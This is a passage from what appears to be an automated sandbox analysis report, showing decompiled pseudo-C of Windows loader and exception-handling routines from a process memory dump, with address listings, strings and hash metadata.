									}
									__eflags =  *(_t223 + 0x18) & 0x00000002;
									if(__eflags != 0) {
										_t157 =  *(_t223 + 0x7c);
										__eflags =  *(_t223 + 0x7c);
										if(__eflags == 0) {
											goto L65;
										}
										E1D815050(_t223,  &_v148, _t157 + _t223);
										__eflags = E1D7F56E0( &_v156,  &_v160);
										if(__eflags == 0) {
											_v196 = 0xc00b0005;
											goto L65;
										}
										_t239 =  *((intOrPtr*)(_t249 + 0x44));
										_t211 = _a8;
										_v204 = _t239;
										__eflags = _t211 & 0x00100000;
										if(__eflags == 0) {
											L12:
											_t229 = _v200;
											goto L13;
										}
										E1D7DA750( *((intOrPtr*)( *[fs:0x18] + 0xfc0)), 0,  &_v204,  &_v205);
										__eflags =  *((char*)(_t249 + 0xf));
										if(__eflags != 0) {
											L66:
											_t229 = _v200;
											_t239 = 0xeeee;
											_v204 = 0xeeee;
											goto L2;
										}
										_t239 = _v204;
										_t211 = _a8;
										goto L12;
									}
									goto L65;
								}
								_t223 = E1D7D8858(_v180, _t223, 1);
								_v172 = _t223;
								__eflags = _t223;
								if(__eflags == 0) {
									goto L65;
								}
								goto L63;
							}
							__eflags = _v190;
							if(_v190 != 0) {
								goto L28;
							}
							__eflags = _v189;
							if(_v189 != 0) {
								goto L28;
							}
							__eflags = L1D7C87E0(_v180);
							if(__eflags < 0) {
								goto L28;
							}
							_t245 = 0;
							_t211 = _a8 | 0x00400000;
							_v190 = 1;
							_t229 = 0;
							_a8 = _t211;
							_v200 = 0;
							_v176 = 0;
							continue;
						}
						_v204 = _t155;
						if(E1D7DA630() == 0) {
							goto L66;
						}
						_t227 = _v176;
						if(_v176 >= ( *( *((intOrPtr*)( *[fs:0x18] + 0xfc0)) + 4) & 0x0000ffff)) {
							goto L66;
						}
						E1D7DA750( *((intOrPtr*)( *[fs:0x18] + 0xfc0)), _t227,  &_v204,  &_v205);
						_t239 = _v216;
						if(_t239 == 0) {
							goto L66;
						}
						_t211 = _a8;
						if(_v205 != _t206) {
							__eflags = _t211 & 0x00100000;
							if(__eflags != 0) {
								_t239 = 0xeeee;
								_v204 = 0xeeee;
							}
						}
						_v176 = _v176 + 1;
						_t245 = _v172;
						goto L12;
						L38:
						_t239 = 0xf2ee;
						_v204 = 0xf2ee;
						goto L14;
					}
				}
			}






























































                                                                                                                                                                                          0x1d7db9c8
                                                                                                                                                                                          0x1d7db9d5
                                                                                                                                                                                          0x1d7db9de
                                                                                                                                                                                          0x1d7db9e2
                                                                                                                                                                                          0x1d7db9e7
                                                                                                                                                                                          0x1d7db9ea
                                                                                                                                                                                          0x1d7db9f0
                                                                                                                                                                                          0x1d7db9f3
                                                                                                                                                                                          0x1d7db9f5
                                                                                                                                                                                          0x1d7db9f9
                                                                                                                                                                                          0x1d7dba01
                                                                                                                                                                                          0x1d7dba09
                                                                                                                                                                                          0x1d7dba0e
                                                                                                                                                                                          0x1d7dba13
                                                                                                                                                                                          0x1d7dba17
                                                                                                                                                                                          0x1d7dba1b
                                                                                                                                                                                          0x1d7dba1f
                                                                                                                                                                                          0x1d7dba26
                                                                                                                                                                                          0x1d7dbc41
                                                                                                                                                                                          0x1d7dbc44
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8337c7
                                                                                                                                                                                          0x1d7dbbe3
                                                                                                                                                                                          0x1d7dbbea
                                                                                                                                                                                          0x1d7dbbeb
                                                                                                                                                                                          0x1d7dbbec
                                                                                                                                                                                          0x1d7dbbf7
                                                                                                                                                                                          0x1d7dbbf7
                                                                                                                                                                                          0x1d7dba2c
                                                                                                                                                                                          0x1d7dba2c
                                                                                                                                                                                          0x1d7dba30
                                                                                                                                                                                          0x1d7dba34
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba40
                                                                                                                                                                                          0x1d7dba40
                                                                                                                                                                                          0x1d7dba42
                                                                                                                                                                                          0x1d7dba46
                                                                                                                                                                                          0x1d7dba4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dba52
                                                                                                                                                                                          0x1d7dba52
                                                                                                                                                                                          0x1d7dba54
                                                                                                                                                                                          0x1d7dba57
                                                                                                                                                                                          0x1d7dbbfa
                                                                                                                                                                                          0x1d7dbbfe
                                                                                                                                                                                          0x1d7dbc01
                                                                                                                                                                                          0x1d7dbc32
                                                                                                                                                                                          0x1d7dbc37
                                                                                                                                                                                          0x1d7dba40
                                                                                                                                                                                          0x1d7dba40
                                                                                                                                                                                          0x1d7dba42
                                                                                                                                                                                          0x1d7dba46
                                                                                                                                                                                          0x1d7dba4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dba4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dba40
                                                                                                                                                                                          0x1d7dbc08
                                                                                                                                                                                          0x1d7dbc0b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbc12
                                                                                                                                                                                          0x1d7dbc15
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbc17
                                                                                                                                                                                          0x1d7dbc1a
                                                                                                                                                                                          0x1d7dbae1
                                                                                                                                                                                          0x1d7dbae9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbaef
                                                                                                                                                                                          0x1d7dbaef
                                                                                                                                                                                          0x1d7dbaf3
                                                                                                                                                                                          0x1d7dbcc0
                                                                                                                                                                                          0x1d7dbcc0
                                                                                                                                                                                          0x1d7dbcc5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbccb
                                                                                                                                                                                          0x1d7dbccc
                                                                                                                                                                                          0x1d7dbcce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbcd4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbcc0
                                                                                                                                                                                          0x1d7dbaf9
                                                                                                                                                                                          0x1d7dbaf9
                                                                                                                                                                                          0x1d7dbafc
                                                                                                                                                                                          0x1d7dbbdf
                                                                                                                                                                                          0x1d7dbbdf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbbdf
                                                                                                                                                                                          0x1d7dbb07
                                                                                                                                                                                          0x1d7dbb11
                                                                                                                                                                                          0x1d7dbb23
                                                                                                                                                                                          0x1d7dbb27
                                                                                                                                                                                          0x1d7dbb2c
                                                                                                                                                                                          0x1d7dbb32
                                                                                                                                                                                          0x1d7dbc97
                                                                                                                                                                                          0x1d7dbc9c
                                                                                                                                                                                          0x1d7dbd0b
                                                                                                                                                                                          0x1d7dbd0b
                                                                                                                                                                                          0x1d7dbd10
                                                                                                                                                                                          0x1d7dbca5
                                                                                                                                                                                          0x1d7dbca5
                                                                                                                                                                                          0x1d7dbca7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbcad
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dba3b
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dbc9e
                                                                                                                                                                                          0x1d7dbca3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbca3
                                                                                                                                                                                          0x1d7dbb4a
                                                                                                                                                                                          0x1d7dbb53
                                                                                                                                                                                          0x1d7dbb5d
                                                                                                                                                                                          0x1d7dbb62
                                                                                                                                                                                          0x1d7dbb65
                                                                                                                                                                                          0x1d7dbb69
                                                                                                                                                                                          0x1d7dbb6d
                                                                                                                                                                                          0x1d7dbc5e
                                                                                                                                                                                          0x1d7dbc60
                                                                                                                                                                                          0x1d7dbdb7
                                                                                                                                                                                          0x1d7dbdb7
                                                                                                                                                                                          0x1d7dbdbf
                                                                                                                                                                                          0x1d7dbdc4
                                                                                                                                                                                          0x1d7dbdc6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8338e7
                                                                                                                                                                                          0x1d8338e9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8338ef
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dba3b
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dbc80
                                                                                                                                                                                          0x1d7dbc82
                                                                                                                                                                                          0x1d7dbc86
                                                                                                                                                                                          0x1d7dbc8a
                                                                                                                                                                                          0x1d7dbc8c
                                                                                                                                                                                          0x1d7dbb7f
                                                                                                                                                                                          0x1d7dbb7f
                                                                                                                                                                                          0x1d7dbb81
                                                                                                                                                                                          0x1d7dbb87
                                                                                                                                                                                          0x1d8338b6
                                                                                                                                                                                          0x1d8338c4
                                                                                                                                                                                          0x1d8338cc
                                                                                                                                                                                          0x1d8338d2
                                                                                                                                                                                          0x1d8338d7
                                                                                                                                                                                          0x1d8338da
                                                                                                                                                                                          0x1d8338dc
                                                                                                                                                                                          0x1d83394b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83394b
                                                                                                                                                                                          0x1d8338de
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dba3b
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dbb8d
                                                                                                                                                                                          0x1d7dbb93
                                                                                                                                                                                          0x1d7dbba5
                                                                                                                                                                                          0x1d7dbbaa
                                                                                                                                                                                          0x1d8338f8
                                                                                                                                                                                          0x1d8338fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83390a
                                                                                                                                                                                          0x1d7dbbb5
                                                                                                                                                                                          0x1d7dbbb8
                                                                                                                                                                                          0x1d833914
                                                                                                                                                                                          0x1d833919
                                                                                                                                                                                          0x1d833922
                                                                                                                                                                                          0x1d83392b
                                                                                                                                                                                          0x1d83392b
                                                                                                                                                                                          0x1d83392e
                                                                                                                                                                                          0x1d83391b
                                                                                                                                                                                          0x1d83391b
                                                                                                                                                                                          0x1d83391b
                                                                                                                                                                                          0x1d833935
                                                                                                                                                                                          0x1d833941
                                                                                                                                                                                          0x1d833941
                                                                                                                                                                                          0x1d7dbbcb
                                                                                                                                                                                          0x1d7dbbdd
                                                                                                                                                                                          0x1d7dbbdd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbbcb
                                                                                                                                                                                          0x1d7dbbb0
                                                                                                                                                                                          0x1d7dbbb0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8338b2
                                                                                                                                                                                          0x1d8338b2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8338b2
                                                                                                                                                                                          0x1d7dbb93
                                                                                                                                                                                          0x1d8338a7
                                                                                                                                                                                          0x1d7dbb77
                                                                                                                                                                                          0x1d7dbb79
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbb79
                                                                                                                                                                                          0x1d7dbb73
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbb73
                                                                                                                                                                                          0x1d7dba5d
                                                                                                                                                                                          0x1d7dba60
                                                                                                                                                                                          0x1d7dbc29
                                                                                                                                                                                          0x1d7dbc2c
                                                                                                                                                                                          0x1d7dbd16
                                                                                                                                                                                          0x1d7dbd19
                                                                                                                                                                                          0x1d833895
                                                                                                                                                                                          0x1d833898
                                                                                                                                                                                          0x1d83389d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83389d
                                                                                                                                                                                          0x1d7dbd1f
                                                                                                                                                                                          0x1d7dbd27
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbd34
                                                                                                                                                                                          0x1d7dbd39
                                                                                                                                                                                          0x1d7dbd3c
                                                                                                                                                                                          0x1d7dbd40
                                                                                                                                                                                          0x1d7dbd42
                                                                                                                                                                                          0x1d7dbd4e
                                                                                                                                                                                          0x1d7dbd4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbd4e
                                                                                                                                                                                          0x1d7dbd44
                                                                                                                                                                                          0x1d7dbd49
                                                                                                                                                                                          0x1d7dbd4c
                                                                                                                                                                                          0x1d7dbd58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbd58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbd4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbc2c
                                                                                                                                                                                          0x1d7dba66
                                                                                                                                                                                          0x1d7dba69
                                                                                                                                                                                          0x1d7dbcd6
                                                                                                                                                                                          0x1d7dbcd9
                                                                                                                                                                                          0x1d7dbd61
                                                                                                                                                                                          0x1d7dbd65
                                                                                                                                                                                          0x1d7dbd67
                                                                                                                                                                                          0x1d7dbd7f
                                                                                                                                                                                          0x1d7dbd7f
                                                                                                                                                                                          0x1d7dbd85
                                                                                                                                                                                          0x1d7dbd91
                                                                                                                                                                                          0x1d7dbd91
                                                                                                                                                                                          0x1d7dbd95
                                                                                                                                                                                          0x1d7dbd9a
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dba3b
                                                                                                                                                                                          0x1d7dba38
                                                                                                                                                                                          0x1d7dbd87
                                                                                                                                                                                          0x1d7dbd8b
                                                                                                                                                                                          0x1d8337f3
                                                                                                                                                                                          0x1d8337f6
                                                                                                                                                                                          0x1d8337f8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d833806
                                                                                                                                                                                          0x1d83381a
                                                                                                                                                                                          0x1d83381c
                                                                                                                                                                                          0x1d83386d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83386d
                                                                                                                                                                                          0x1d83381e
                                                                                                                                                                                          0x1d833823
                                                                                                                                                                                          0x1d833826
                                                                                                                                                                                          0x1d83382b
                                                                                                                                                                                          0x1d833831
                                                                                                                                                                                          0x1d7dbadd
                                                                                                                                                                                          0x1d7dbadd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbadd
                                                                                                                                                                                          0x1d833850
                                                                                                                                                                                          0x1d833855
                                                                                                                                                                                          0x1d83385a
                                                                                                                                                                                          0x1d7dbda4
                                                                                                                                                                                          0x1d7dbda4
                                                                                                                                                                                          0x1d7dbda8
                                                                                                                                                                                          0x1d7dbdad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbdad
                                                                                                                                                                                          0x1d833860
                                                                                                                                                                                          0x1d833865
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d833865
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbd8b
                                                                                                                                                                                          0x1d7dbd75
                                                                                                                                                                                          0x1d7dbd77
                                                                                                                                                                                          0x1d7dbd7b
                                                                                                                                                                                          0x1d7dbd7d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbd7d
                                                                                                                                                                                          0x1d7dbcdf
                                                                                                                                                                                          0x1d7dbce4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbcea
                                                                                                                                                                                          0x1d7dbcef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbcfe
                                                                                                                                                                                          0x1d7dbd00
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8337d4
                                                                                                                                                                                          0x1d8337d6
                                                                                                                                                                                          0x1d8337dc
                                                                                                                                                                                          0x1d8337e1
                                                                                                                                                                                          0x1d8337e3
                                                                                                                                                                                          0x1d8337e6
                                                                                                                                                                                          0x1d8337ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8337ea
                                                                                                                                                                                          0x1d7dba6f
                                                                                                                                                                                          0x1d7dba7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dba87
                                                                                                                                                                                          0x1d7dba97
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbab5
                                                                                                                                                                                          0x1d7dbaba
                                                                                                                                                                                          0x1d7dbac2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbac8
                                                                                                                                                                                          0x1d7dbacf
                                                                                                                                                                                          0x1d83387a
                                                                                                                                                                                          0x1d833880
                                                                                                                                                                                          0x1d833886
                                                                                                                                                                                          0x1d83388b
                                                                                                                                                                                          0x1d83388b
                                                                                                                                                                                          0x1d833880
                                                                                                                                                                                          0x1d7dbad5
                                                                                                                                                                                          0x1d7dbad9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbc4f
                                                                                                                                                                                          0x1d7dbc4f
                                                                                                                                                                                          0x1d7dbc54
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbc54
                                                                                                                                                                                          0x1d7dba40

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 'LDR: %s(), invalid image format of MUI file , xrefs: 1D8338BB
                                                                                                                                                                                          • LdrpLoadResourceFromAlternativeModule, xrefs: 1D8338B6
                                                                                                                                                                                          • {, xrefs: 1D8338C4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                                                                                                                                                          • API String ID: 0-1697150599
                                                                                                                                                                                          • Opcode ID: b6b84e1be3a5009ba38cfdf1ba6bcf7d0e4adb399b44899ac3f83d31c1d66494
                                                                                                                                                                                          • Instruction ID: aecbe73d909353e5737118867b48797d21a3dfa4ff163279d3fb665f98f5cb6a
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6b84e1be3a5009ba38cfdf1ba6bcf7d0e4adb399b44899ac3f83d31c1d66494
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E14430608B869BD795CE14C580B7BB7F1BF88B64F41892EE8898B260D774D945CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D808FBC Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                          			E1D808FBC(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v16;
				intOrPtr _v84;
				char _v92;
				signed char _v96;
				signed char _v100;
				signed char _v104;
				char _v108;
				char _v112;
				signed int _v116;
				signed char _v120;
				intOrPtr _v124;
				char _v125;
				intOrPtr _v128;
				void* _v132;
				void* _v133;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				signed int _t91;
				signed char _t94;
				intOrPtr _t103;
				signed int _t104;
				signed char _t109;
				void* _t120;
				char* _t127;
				signed char _t128;
				intOrPtr _t129;
				signed char _t131;
				signed char _t144;
				void* _t148;
				intOrPtr _t149;
				void* _t150;
				signed char _t152;
				intOrPtr* _t155;
				void* _t156;
				signed int _t157;
				signed int _t159;

				_t159 = (_t157 & 0xfffffff8) - 0x7c;
				_t87 =  *0x1d8cb370 ^ _t159;
				_v8 =  *0x1d8cb370 ^ _t159;
				_t139 = _a8;
				_t155 = _a4;
				_t119 = 0;
				_push(_t148);
				_v124 = _a8;
				_v125 = 0;
				if( *_t155 == 0xc0000006 || E1D80931B(_t87,  *((intOrPtr*)(_t155 + 0xc))) == 0) {
					if(( *( *[fs:0x30] + 0x68) & 0x00800000) != 0) {
						_v125 = 1;
						E1D888BBD(_t155, _t139);
					}
					_t90 = E1D7F0130();
					_t149 = _v124;
					if(_t90 != 0) {
						_t91 = E1D809325(_t119,  *((intOrPtr*)(_t149 + 0xc4)), _t149, _t155, __eflags);
						__eflags = _t91;
						if(_t91 != 0) {
							goto L4;
						} else {
							_t131 = 0xd;
							asm("int 0x29");
							goto L25;
						}
					} else {
						L4:
						if(E1D80CCD1(_t155, _t149, _t119) != 0) {
							L20:
							_t119 = 1;
							L21:
							_t139 = _v124;
							E1D80CCD1(_t155, _v124, 1);
							_t94 = _t119;
							goto L22;
						}
						_t127 =  &_v112;
						E1D8092EF(_t127,  &_v108);
						_t151 =  *[fs:0x0];
						_push(_t119);
						_push("true");
						_push( &_v116);
						_push(0x22);
						_push(0xffffffff);
						_v120 =  *[fs:0x0];
						_v116 = _t119;
						if(E1D812B20() < 0) {
							_v116 = _t119;
						}
						if((_v116 & 0x00000040) != 0) {
							L8:
							_t128 = _v120;
							_v104 = _t119;
							L9:
							if(_t128 == 0xffffffff) {
								goto L21;
							}
							if(_t128 < _v112 || _t128 + 8 > _v108 || (_t128 & 0x00000003) != 0) {
								L29:
								 *(_t155 + 4) =  *(_t155 + 4) | 0x00000008;
								goto L21;
							} else {
								_t129 =  *((intOrPtr*)(_t128 + 4));
								if(_t129 < _v108) {
									__eflags = _v112 - _t129;
									if(_v112 > _t129) {
										goto L14;
									}
									goto L29;
								}
								L14:
								if(E1D809193(_t129, _v116, _v124) == 0) {
									goto L29;
								}
								_t152 = _v120;
								_v100 = _t119;
								if(_v125 != _t119) {
									_v108 = E1D888C65(_t155, _v124, _t129,  *((intOrPtr*)(_t152 + 4)));
								}
								_t103 = E1D828860(_t155, _t152, _v124,  &_v96,  *((intOrPtr*)(_t152 + 4)));
								_t131 = _v120;
								if(_t131 != 0) {
									 *((intOrPtr*)(_t131 + 0x320)) = _t103;
								}
								_t144 = _v104;
								if(_t144 == _t152) {
									 *(_t155 + 4) =  *(_t155 + 4) & 0xffffffef;
									_t144 = _t119;
									_v104 = _t144;
								}
								_t91 = _t103 - _t119;
								if(_t91 != 0) {
									L25:
									_t104 = _t91 - 1;
									__eflags = _t104;
									if(_t104 != 0) {
										__eflags = _t104 == 1;
										if(_t104 == 1) {
											 *(_t155 + 4) =  *(_t155 + 4) | 0x00000010;
											__eflags = _v96 - _t144;
											if(_v96 > _t144) {
												_v104 = _v96;
											}
										} else {
											_v92 = 0xc0000026;
											_push( &_v92);
											 *((intOrPtr*)(_t159 + 0x38)) = 1;
											_v84 = _t155;
											 *(_t159 + 0x44) = _t119;
											E1D828A60(_t131, _t144);
										}
										goto L27;
									}
									goto L26;
								} else {
									_t109 = _t91 + 1;
									if(( *(_t155 + 4) & _t109) != 0) {
										 *(_t159 + 0x34) = _t109;
										_push( &_v92);
										_v92 = 0xc0000025;
										_v84 = _t155;
										 *(_t159 + 0x44) = _t119;
										E1D828A60(_t131, _t144);
										L26:
										__eflags =  *(_t155 + 4) & 0x00000008;
										if(( *(_t155 + 4) & 0x00000008) != 0) {
											goto L21;
										}
										L27:
										_t128 =  *_v120;
										_v120 = _t128;
										goto L9;
									}
									goto L20;
								}
							}
						} else {
							_push(_t127);
							if(E1D809284(_t151, _v112, _v108) == 0) {
								 *(_t155 + 4) =  *(_t155 + 4) | 0x00000008;
								__eflags =  *0x1d8c38bc - 2;
								if( *0x1d8c38bc != 2) {
									goto L21;
								}
								asm("lock cmpxchg [edx], ecx");
								__eflags = 0;
								if(0 == 0) {
									E1D8867F9(_t119, _t155, _v128, 0);
								}
								 *(_t155 + 4) =  *(_t155 + 4) & 0xfffffff7;
							}
							goto L8;
						}
					}
				} else {
					E1D883A55(0,  *((intOrPtr*)(_t139 + 0xac)), _t139, _t148);
					 *((intOrPtr*)(_v124 + 0xb8)) = E1D8867F3();
					_t94 = 1;
					L22:
					_pop(_t150);
					_pop(_t156);
					_pop(_t120);
					return E1D814B50(_t94, _t120, _v8 ^ _t159, _t139, _t150, _t156);
				}
			}











































                                                                                                                                                                                          0x1d808fc4
                                                                                                                                                                                          0x1d808fcc
                                                                                                                                                                                          0x1d808fce
                                                                                                                                                                                          0x1d808fd2
                                                                                                                                                                                          0x1d808fd7
                                                                                                                                                                                          0x1d808fda
                                                                                                                                                                                          0x1d808fdc
                                                                                                                                                                                          0x1d808fdd
                                                                                                                                                                                          0x1d808fe1
                                                                                                                                                                                          0x1d808feb
                                                                                                                                                                                          0x1d80900a
                                                                                                                                                                                          0x1d845a79
                                                                                                                                                                                          0x1d845a7e
                                                                                                                                                                                          0x1d845a7e
                                                                                                                                                                                          0x1d809010
                                                                                                                                                                                          0x1d809015
                                                                                                                                                                                          0x1d80901b
                                                                                                                                                                                          0x1d809153
                                                                                                                                                                                          0x1d809158
                                                                                                                                                                                          0x1d80915a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d809160
                                                                                                                                                                                          0x1d809162
                                                                                                                                                                                          0x1d809163
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d809163
                                                                                                                                                                                          0x1d809021
                                                                                                                                                                                          0x1d809021
                                                                                                                                                                                          0x1d80902d
                                                                                                                                                                                          0x1d809125
                                                                                                                                                                                          0x1d809125
                                                                                                                                                                                          0x1d809127
                                                                                                                                                                                          0x1d809127
                                                                                                                                                                                          0x1d80912f
                                                                                                                                                                                          0x1d809134
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d809134
                                                                                                                                                                                          0x1d809037
                                                                                                                                                                                          0x1d80903b
                                                                                                                                                                                          0x1d809040
                                                                                                                                                                                          0x1d80904b
                                                                                                                                                                                          0x1d80904c
                                                                                                                                                                                          0x1d80904e
                                                                                                                                                                                          0x1d80904f
                                                                                                                                                                                          0x1d809051
                                                                                                                                                                                          0x1d809053
                                                                                                                                                                                          0x1d809057
                                                                                                                                                                                          0x1d809062
                                                                                                                                                                                          0x1d845a88
                                                                                                                                                                                          0x1d845a88
                                                                                                                                                                                          0x1d80906d
                                                                                                                                                                                          0x1d809087
                                                                                                                                                                                          0x1d809087
                                                                                                                                                                                          0x1d80908b
                                                                                                                                                                                          0x1d80908f
                                                                                                                                                                                          0x1d809092
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80909c
                                                                                                                                                                                          0x1d80918d
                                                                                                                                                                                          0x1d80918d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8090b8
                                                                                                                                                                                          0x1d8090b8
                                                                                                                                                                                          0x1d8090bf
                                                                                                                                                                                          0x1d809183
                                                                                                                                                                                          0x1d809187
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d809187
                                                                                                                                                                                          0x1d8090c5
                                                                                                                                                                                          0x1d8090d4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8090da
                                                                                                                                                                                          0x1d8090de
                                                                                                                                                                                          0x1d8090e6
                                                                                                                                                                                          0x1d845ad7
                                                                                                                                                                                          0x1d845ad7
                                                                                                                                                                                          0x1d8090fa
                                                                                                                                                                                          0x1d8090ff
                                                                                                                                                                                          0x1d809105
                                                                                                                                                                                          0x1d845ae0
                                                                                                                                                                                          0x1d845ae0
                                                                                                                                                                                          0x1d80910b
                                                                                                                                                                                          0x1d809111
                                                                                                                                                                                          0x1d845aeb
                                                                                                                                                                                          0x1d845aef
                                                                                                                                                                                          0x1d845af1
                                                                                                                                                                                          0x1d845af1
                                                                                                                                                                                          0x1d809117
                                                                                                                                                                                          0x1d809119
                                                                                                                                                                                          0x1d809165
                                                                                                                                                                                          0x1d809165
                                                                                                                                                                                          0x1d809165
                                                                                                                                                                                          0x1d809168
                                                                                                                                                                                          0x1d845afa
                                                                                                                                                                                          0x1d845afd
                                                                                                                                                                                          0x1d845b26
                                                                                                                                                                                          0x1d845b2a
                                                                                                                                                                                          0x1d845b2e
                                                                                                                                                                                          0x1d845b38
                                                                                                                                                                                          0x1d845b38
                                                                                                                                                                                          0x1d845aff
                                                                                                                                                                                          0x1d845b03
                                                                                                                                                                                          0x1d845b0b
                                                                                                                                                                                          0x1d845b0c
                                                                                                                                                                                          0x1d845b14
                                                                                                                                                                                          0x1d845b18
                                                                                                                                                                                          0x1d845b1c
                                                                                                                                                                                          0x1d845b1c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d845afd
                                                                                                                                                                                          0x00000000
